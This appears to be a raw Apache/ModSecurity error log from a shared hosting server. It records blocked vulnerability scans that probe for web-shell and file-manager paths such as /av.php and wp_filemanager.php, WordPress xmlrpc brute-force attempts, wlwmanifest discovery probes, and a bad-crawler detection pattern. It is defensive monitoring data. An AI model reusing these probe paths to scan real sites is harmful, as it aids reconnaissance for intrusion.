[Tue May 26 14:00:46.470791 2026] [security2:error] [pid 578581:tid 578768] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaNpm_8al1sb-umPtfwQAAADk"]
[Tue May 26 14:00:46.652801 2026] [security2:error] [pid 578581:tid 578822] [client 20.48.248.215:25265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahVaNpm_8al1sb-umPtf0AAAAG8"]
[Tue May 26 14:00:46.652917 2026] [security2:error] [pid 578581:tid 578822] [client 20.48.248.215:25265] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahVaNpm_8al1sb-umPtf0AAAAG8"]
[Tue May 26 14:00:47.464308 2026] [security2:error] [pid 578581:tid 578713] [client 45.173.16.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaN5m_8al1sb-umPtf2AAAAAI"]
[Tue May 26 14:00:48.311654 2026] [security2:error] [pid 578581:tid 578788] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaN5m_8al1sb-umPtf6wAAAE0"]
[Tue May 26 14:00:48.502857 2026] [autoindex:error] [pid 578581:tid 578596] [remote 44.244.61.163:51306] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:00:49.170811 2026] [security2:error] [pid 578581:tid 578762] [client 4.204.220.190:59209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.shankhanaad.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVaOZm_8al1sb-umPtgCQAAADM"]
[Tue May 26 14:00:49.170994 2026] [security2:error] [pid 578581:tid 578762] [client 4.204.220.190:59209] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.shankhanaad.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVaOZm_8al1sb-umPtgCQAAADM"]
[Tue May 26 14:00:49.317880 2026] [security2:error] [pid 578581:tid 578717] [client 4.204.220.190:59173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.shankhanaad.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVaOZm_8al1sb-umPtgCgAAAAY"]
[Tue May 26 14:00:49.318017 2026] [security2:error] [pid 578581:tid 578717] [client 4.204.220.190:59173] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.shankhanaad.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVaOZm_8al1sb-umPtgCgAAAAY"]
[Tue May 26 14:00:50.433441 2026] [security2:error] [pid 578581:tid 578713] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaOpm_8al1sb-umPtgHQAAAAI"]
[Tue May 26 14:00:51.185068 2026] [security2:error] [pid 578581:tid 578788] [client 202.141.30.10:65390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaO5m_8al1sb-umPtgOgAAAE0"]
[Tue May 26 14:00:51.185203 2026] [security2:error] [pid 578581:tid 578788] [client 202.141.30.10:65390] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaO5m_8al1sb-umPtgOgAAAE0"]
[Tue May 26 14:00:52.168265 2026] [security2:error] [pid 578581:tid 578792] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaO5m_8al1sb-umPtgRgAAAFE"]
[Tue May 26 14:00:53.834295 2026] [security2:error] [pid 578581:tid 578610] [remote 119.12.197.142:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/wedding-venue-in-bangalore-or-banquet-hall/"] [unique_id "ahVaPZm_8al1sb-umPtgdwAANRw"], referer: https://kingsclub.in/wedding-venue-in-bangalore-or-banquet-hall/
[Tue May 26 14:00:54.062523 2026] [security2:error] [pid 578581:tid 578770] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaPZm_8al1sb-umPtgcwAAADs"]
[Tue May 26 14:00:55.325047 2026] [security2:error] [pid 578581:tid 578763] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaPpm_8al1sb-umPtgnQAAADQ"]
[Tue May 26 14:00:56.286999 2026] [security2:error] [pid 578581:tid 578736] [client 129.222.147.134:36115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaQJm_8al1sb-umPtgvQAAABk"]
[Tue May 26 14:00:56.287150 2026] [security2:error] [pid 578581:tid 578736] [client 129.222.147.134:36115] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaQJm_8al1sb-umPtgvQAAABk"]
[Tue May 26 14:00:56.852022 2026] [security2:error] [pid 578581:tid 578620] [remote 213.188.68.80:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/wedding-venue-in-bangalore-or-banquet-hall/"] [unique_id "ahVaQJm_8al1sb-umPtg0gAAEyY"], referer: https://kingsclub.in/wedding-venue-in-bangalore-or-banquet-hall/
[Tue May 26 14:00:56.852184 2026] [security2:error] [pid 578581:tid 578730] [client 213.188.68.80:0] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "kingsclub.in"] [uri "/wedding-venue-in-bangalore-or-banquet-hall/"] [unique_id "ahVaQJm_8al1sb-umPtg0gAAEyY"], referer: https://kingsclub.in/wedding-venue-in-bangalore-or-banquet-hall/
[Tue May 26 14:00:57.696520 2026] [security2:error] [pid 578581:tid 578722] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaQZm_8al1sb-umPtg5AAAAAs"]
[Tue May 26 14:00:58.123584 2026] [security2:error] [pid 578581:tid 578779] [client 20.48.248.215:24782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahVaQpm_8al1sb-umPthAgAAAEQ"]
[Tue May 26 14:00:58.123678 2026] [security2:error] [pid 578581:tid 578779] [client 20.48.248.215:24782] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahVaQpm_8al1sb-umPthAgAAAEQ"]
[Tue May 26 14:00:59.641098 2026] [security2:error] [pid 578581:tid 578787] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaQ5m_8al1sb-umPthHAAAAEw"]
[Tue May 26 14:01:00.077477 2026] [fcgid:warn] [pid 578581:tid 578820] (70014)End of file found: [client 199.45.155.73:58144] mod_fcgid: can't get data from http client
[Tue May 26 14:01:01.318521 2026] [security2:error] [pid 578581:tid 578792] [client 20.48.248.215:25764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/77.php"] [unique_id "ahVaRZm_8al1sb-umPthTQAAAFE"]
[Tue May 26 14:01:01.318621 2026] [security2:error] [pid 578581:tid 578792] [client 20.48.248.215:25764] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/77.php"] [unique_id "ahVaRZm_8al1sb-umPthTQAAAFE"]
[Tue May 26 14:01:01.917278 2026] [security2:error] [pid 578581:tid 578713] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaRZm_8al1sb-umPthUQAAAAI"]
[Tue May 26 14:01:02.003173 2026] [security2:error] [pid 578581:tid 578819] [client 202.141.30.10:65533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaRpm_8al1sb-umPthYgAAAGw"]
[Tue May 26 14:01:02.003343 2026] [security2:error] [pid 578581:tid 578819] [client 202.141.30.10:65533] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaRpm_8al1sb-umPthYgAAAGw"]
[Tue May 26 14:01:03.268355 2026] [autoindex:error] [pid 578581:tid 578829] [client 35.243.187.234:52373] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:01:03.431631 2026] [security2:error] [pid 578581:tid 578730] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaRpm_8al1sb-umPthdAAAABM"]
[Tue May 26 14:01:04.051896 2026] [security2:error] [pid 578581:tid 578832] [client 35.243.187.234:52373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.187.243.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "restmoll.com"] [uri "/xmlrpc.php"] [unique_id "ahVaR5m_8al1sb-umPthhgAAAHk"]
[Tue May 26 14:01:04.212919 2026] [security2:error] [pid 578581:tid 578800] [client 35.243.187.234:56337] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSJm_8al1sb-umPthkwAAAFk"]
[Tue May 26 14:01:04.542763 2026] [security2:error] [pid 578581:tid 578835] [client 35.243.187.234:56346] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSJm_8al1sb-umPthlQAAAHw"]
[Tue May 26 14:01:04.711047 2026] [security2:error] [pid 578581:tid 578775] [client 35.243.187.234:53087] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSJm_8al1sb-umPthoQAAAEA"]
[Tue May 26 14:01:04.959950 2026] [security2:error] [pid 578581:tid 578826] [client 35.243.187.234:62287] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSJm_8al1sb-umPthpgAAAHM"]
[Tue May 26 14:01:05.005128 2026] [security2:error] [pid 578581:tid 578805] [client 199.45.155.73:39324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.155.45.199.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.quincaillerie.azurmediatec.com"] [uri "/viewimage.php"] [unique_id "ahVaSJm_8al1sb-umPthpQAAAF4"]
[Tue May 26 14:01:05.101589 2026] [security2:error] [pid 578581:tid 578804] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaSJm_8al1sb-umPthoAAAAF0"]
[Tue May 26 14:01:05.236925 2026] [security2:error] [pid 578581:tid 578789] [client 35.243.187.234:53242] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSZm_8al1sb-umPthqgAAAE4"]
[Tue May 26 14:01:05.496256 2026] [security2:error] [pid 578581:tid 578773] [client 35.243.187.234:62600] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSZm_8al1sb-umPthtAAAAD4"]
[Tue May 26 14:01:05.749143 2026] [security2:error] [pid 578581:tid 578755] [client 35.243.187.234:55368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSZm_8al1sb-umPthuAAAACw"]
[Tue May 26 14:01:05.985512 2026] [security2:error] [pid 578581:tid 578764] [client 35.243.187.234:52597] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSZm_8al1sb-umPthwwAAADU"]
[Tue May 26 14:01:06.330287 2026] [security2:error] [pid 578581:tid 578819] [client 35.243.187.234:64024] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSpm_8al1sb-umPthzwAAAGw"]
[Tue May 26 14:01:06.420531 2026] [security2:error] [pid 578581:tid 578747] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaSZm_8al1sb-umPthxQAAACQ"]
[Tue May 26 14:01:06.528483 2026] [security2:error] [pid 578581:tid 578734] [client 129.222.147.134:24822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaSpm_8al1sb-umPth1wAAABc"]
[Tue May 26 14:01:06.528603 2026] [security2:error] [pid 578581:tid 578734] [client 129.222.147.134:24822] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaSpm_8al1sb-umPth1wAAABc"]
[Tue May 26 14:01:06.600359 2026] [security2:error] [pid 578581:tid 578825] [client 35.243.187.234:49767] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSpm_8al1sb-umPth3gAAAHI"]
[Tue May 26 14:01:06.853763 2026] [security2:error] [pid 578581:tid 578804] [client 35.243.187.234:51785] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVaSpm_8al1sb-umPth5gAAAF0"]
[Tue May 26 14:01:07.258807 2026] [security2:error] [pid 578581:tid 578755] [client 35.243.187.234:58054] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "restmoll.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVaS5m_8al1sb-umPth9AAAACw"]
[Tue May 26 14:01:09.036324 2026] [security2:error] [pid 578581:tid 578737] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaTJm_8al1sb-umPtiFgAAABo"]
[Tue May 26 14:01:09.848899 2026] [security2:error] [pid 578581:tid 578742] [client 14.173.155.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaTZm_8al1sb-umPtiLAAAAB8"]
[Tue May 26 14:01:10.561917 2026] [security2:error] [pid 578581:tid 578827] [client 20.48.248.215:25239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/x402.php"] [unique_id "ahVaTpm_8al1sb-umPtiTQAAAHQ"]
[Tue May 26 14:01:10.562035 2026] [security2:error] [pid 578581:tid 578827] [client 20.48.248.215:25239] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/x402.php"] [unique_id "ahVaTpm_8al1sb-umPtiTQAAAHQ"]
[Tue May 26 14:01:10.772422 2026] [security2:error] [pid 578581:tid 578759] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaTpm_8al1sb-umPtiRwAAADA"]
[Tue May 26 14:01:11.697228 2026] [security2:error] [pid 578581:tid 578767] [client 20.206.111.238:14058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVaT5m_8al1sb-umPtiZwAAADg"]
[Tue May 26 14:01:11.697467 2026] [security2:error] [pid 578581:tid 578767] [client 20.206.111.238:14058] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVaT5m_8al1sb-umPtiZwAAADg"]
[Tue May 26 14:01:12.080125 2026] [security2:error] [pid 578581:tid 578814] [client 20.206.111.238:14069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/adminfuns.php"] [unique_id "ahVaUJm_8al1sb-umPticQAAAGc"]
[Tue May 26 14:01:12.080257 2026] [security2:error] [pid 578581:tid 578814] [client 20.206.111.238:14069] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/adminfuns.php"] [unique_id "ahVaUJm_8al1sb-umPticQAAAGc"]
[Tue May 26 14:01:12.472799 2026] [security2:error] [pid 578581:tid 578727] [client 20.206.111.238:14071] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/sx_pms.php"] [unique_id "ahVaUJm_8al1sb-umPtigQAAABA"]
[Tue May 26 14:01:12.472915 2026] [security2:error] [pid 578581:tid 578727] [client 20.206.111.238:14071] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.stockmarketanalysis.in"] [uri "/sx_pms.php"] [unique_id "ahVaUJm_8al1sb-umPtigQAAABA"]
[Tue May 26 14:01:12.800978 2026] [security2:error] [pid 578581:tid 578756] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaUJm_8al1sb-umPtiewAAAC0"]
